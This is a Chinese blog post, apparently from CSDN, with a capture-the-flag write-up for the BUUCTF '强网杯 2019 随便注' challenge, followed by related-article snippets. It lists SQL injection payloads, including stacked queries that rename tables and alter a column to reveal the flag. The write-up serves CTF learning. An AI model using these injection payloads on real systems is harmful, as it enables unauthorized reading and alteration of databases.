buuctf 强网杯 2019 随便注1

最新推荐文章于 2024-06-19 09:25:55 发布
最新推荐文章于 2024-06-19 09:25:55 发布
阅读量89 收藏
点赞数
分类专栏: buuctf ctf buu 文章标签: sql 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_63883187/article/details/128677709
版权
ctf 同时被 3 个专栏收录
10 篇文章 0 订阅
订阅专栏
buuctf
9 篇文章 0 订阅
订阅专栏
buu
9 篇文章 0 订阅
订阅专栏

先打开环境,

试试基本的注入  1' or 1=1#

看起来没有什么能看得懂的!

那就来判断一下字段数把!

先用这个试试  1' order by 2;#

再来这个 1' order by 3;#

 

到第3列报错,说明只显示两列。

 

 

看到上面看到有一个“1919810931114514”和“words”这两个表,分别进去看看有什么

分别输入

0'; show columns from `words`;#

0'; show columns from `1919810931114514`;#

 

 

可以看到words表里有两个属性,即两列:id 和data

而1919810931114514表里只有一个属性列

说明输入框可能查询的就是words表

后台sql语句可能为

select id,data from words where id=

接下来就是如何获取flag了

思路是把1919810931114514表改名为words表,把属性名flag改为id,然后用1’ or 1=1;# 显示flag出来

在这之前当然要先把words表改名为其他

payload:

1';rename table `words` to words2;

rename table `1919810931114514` to `words`;

 alter table words change flag id varchar(100);

  show tables;

  show columns from words;#

后两句是用来查结果的。

此时再用1’ or 1=1;# 就可以看到flag了!!! 

 

 

 

3百
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
BUUCTF】web之强网杯2019随便
12-14
开始入: 1’ : 报错 1’ #:回显正常 1’ order by 1 #: 正常(经测试列数为2–此处小白暗自窃喜) 1’ union select 1,2#: 回显 如图 看来此方法是行不通了,但经过苦苦寻求,了解到了堆叠入: 库:1’;show databases;# 得到数据库 表:1’;show tables;# 得到俩个表 列:1’;show columns from ‘表名’;# 这里意表名为数字的要加反引号 “ :在网上百度发现 得到 一个带有flag的字段 和 另一个 可查询的表 flag表:可查询表: 到这里虽然发现flag 但是select已经被ban了所
BUUCTF-PWN-[ZJCTF 2019]Login
07-10
BUUCTF-PWN-[ZJCTF 2019]Login
BUUCTF---[强网杯 2019]随便1
2201_75556700的博客
01-04 418
8.更改表名列名(因为查询是查id但是id在words中而flag却在另一个表中,于是我们就想到把两个表名换一下,然后flag换为id)是将flag的属性换位id属性。4.接着尝试order by+数字(1' order by 2#)(2' order by 3#)执行第二句的时候会报错,说明表中只有两列数据。5.接下来使用联合查询1' union select 1,2(但是select被过滤了)9.使用1’ or ‘1’='1查看表的内容就可以获得flag。3.尝试0' or '1'='1,发现有回显。
buuctf web题解之[强网杯 2019]随便1详解,网络安全架构师之路
2401_83739284的博客
04-17 808
先自我介绍一下,小编浙江大学毕业,去过华为、字节跳动等大厂,目前阿里P7深知大多数程序员,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《2024年最新网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。 既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,涵盖了95%以上网络安全知识点,真正体系化!由于文件比较多,这里只是将部分目录截图出来,全套包含大厂
BUUCTF逆向前八题
01-24
内容为BUUCTF里reserve的前八题自己的一些解题思路
BasicASM.s(BUUCTF
06-04
分析过程文件
2020网鼎杯青龙组Boom
05-12
2020网鼎杯青龙组Boom。如果需要的可以下载,其实就是解方程而已,没啥难度。
SQLAlchemy 连接池
youhebuke225的博客
06-17 194
调整这些参数可以帮助你更好地管理数据库连接,并减少因连接超时或服务器断开连接而导致的问题。记得根据你的应用程序的需求和数据库服务器的配置来合理设置这些参数。在 SQLAlchemy 中,确实可以通过配置连接池的参数来管理连接的超时和回收,从而确保连接在需要时能够被重新建立。SQLAlchemy 使用的是。作为其默认的连接池实现。为了配置这些参数,你可以在创建引擎时将它们传递给。
PostgreSQL源码分析——绑定变量
让我思考一下
06-18 155
这里分析一下函数中应用绑定变量的问题,但实际应用场景中,不推荐这么使用。
PostgreSQL源码分析——CREATE TYPE
让我思考一下
06-18 254
定义一个复合类型某种程度上就是定义一张新的表,表的rowtype就是复合类型。会看到创建一个复合类型的同时会创建一个同名的表。这个表可以在pg_class系统表中查到,但是通过\d等却查不到,也不能想表中插入数据,因为它并不是真正意义上的表,只是用表实现复合类型。这部分因为不是可优化语句,没有什么处理。这部分因为是Utility语句,没有什么处理的。创建复合类型,我们分析一下其源码实现。
SQL中distinct去重关键字的使用和count统计组合的使用
睡不醒的每天
06-13 513
distinct必须在列的前面,否则直接提示错误,当distinct作用于单列的的情况下,统计查询的结果为行数目的总数,包含null为空的数目。count(distinct 列名):根据指定的列统计记录总数,不包含重复的记录,不包括NULL或空的值。select distinct 列名1,列名2,列名3…select distinct 列名 from 表;也可以使用count(2)、count(3)等等。count(distinct 列名)
PostgreSQL源码分析——CREATE CAST
让我思考一下
06-18 244
语句自定义一个类型转换,数据库肯定有个地方将这个转换的信息存起来,这个地方就是pg_cast系统表。pg_cast系统表存在数据类型转换路径,包括内建和用户自定义的。函数的主要内容就是将用户自定义的类型转换信息插入到pg_cast系统表中。下面我们主要分析一下其源码,看一下是如何实现的。我们首先分析一下其语法解析部分,这部分比较简单,核心是。如何使用以及用法请参考PostgreSQL文档中。后续会重点分析一下这个函数。—— 定义一个用户自定义的类型转换。非常容易理解,下面我们重点分析一下。
PostgreSQL源码分析 —— CAST类型转换
让我思考一下
06-18 400
我们分析一下PostgreSQL中显式类型转换是如何实现的,在PostgreSQL中,显式类型转换可以用等同于。这里我们以为例进行分析。再结合之前对的分析,基本就弄清了一部分PostgreSQL中数据类型转换问题。当然要完整的理解类型转换还需要完整的理解PostgreSQL中的类型系统,后续还需要我们逐步的深入理解。
PostgreSQL的扩展(extensions)-常用的扩展-pg_stat_monitor
lee_vincent1的博客
06-13 1027
是 PostgreSQL 的一个扩展,它提供了一种先进的监控和统计 SQL 查询的方式,相比于标准的,它提供了更丰富和详细的查询统计信息。通过捕获和分析 SQL 查询的执行情况,帮助数据库管理员优化数据库性能。
SQL:按用户名复制权限
wudechun的博客
06-17 240
原来为每个用户添加菜单的访问权限时都是一个一个添加,但今天遇到有个新来的员工,需要具有与另一个员工相同的权限。新建一个用户后,如果还按之前的方式添加菜单的访问权限,将是很麻烦的事,于是需要设计一个权限复制的功能。用sql实现:一个数据表中有userid、menuid,根据userid=2筛选出menuid,然后将userid=3和前面筛选出的menuid再插入到本数据表中。但按这样来操作的话,最少都要3步,需要看看还有没有更优的方法,比如用一句SQL语句就实现。然后我自己再修改了查询对应用户的id的语句。
PostgreSQL源码分析——视图查询重写
让我思考一下
06-18 431
这里我们分析一下查询重写的过程,主要分析视图的查询重写的过程。
PostgreSQL源码分析——基础备份
最新发布
让我思考一下
06-19 676
进行基础备份有2中方式,可使用pg_basebackup工具或其他备份工具进行备份,另一种是使用底层命令进行基础备份。pg_basebackup等工具其实是封装了底层命令,所以,为了更好的理解基础备份的过程,这里我们使用底层命令进行备份。并分析其中的源码实现。
PostgreSQL的系统视图pg_policies
lee_vincent1的博客
06-14 436
是 PostgreSQL 的一个系统视图,用于显示数据库中定义的行级安全策略(Row-Level Security Policies)。行级安全策略是一种访问控制机制,它允许你定义基于行的访问控制规则,通过策略来控制用户对特定行数据的访问。行级安全策略在 PostgreSQL 9.5 及之后的版本中引入,旨在增强数据库的安全性,使其能够支持更细粒度的访问控制。
【译】SQLAlchemy文档:SQLAlchemy 统一教程
一只大鸽子的博客
06-12 1191
**SQLAlchemy** 是 Python **SQL工具包**和**ORM**,它为应用程序开发人员提供了 SQL 的全部功能和灵活性。它提供了一整套企业级持久性模式,专为高效和高性能的数据库访问而设计。
buuctf-强网杯2019随便
09-03
buuctf-强网杯2019随便是一场2019强网杯举办的CTF比赛中的一道题目。这道题目的名称暗示着它是一个与入漏洞相关的题目。 入漏洞是一种网络安全漏洞,攻击者可以通过在用户输入的数据中入恶意代码来获取...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值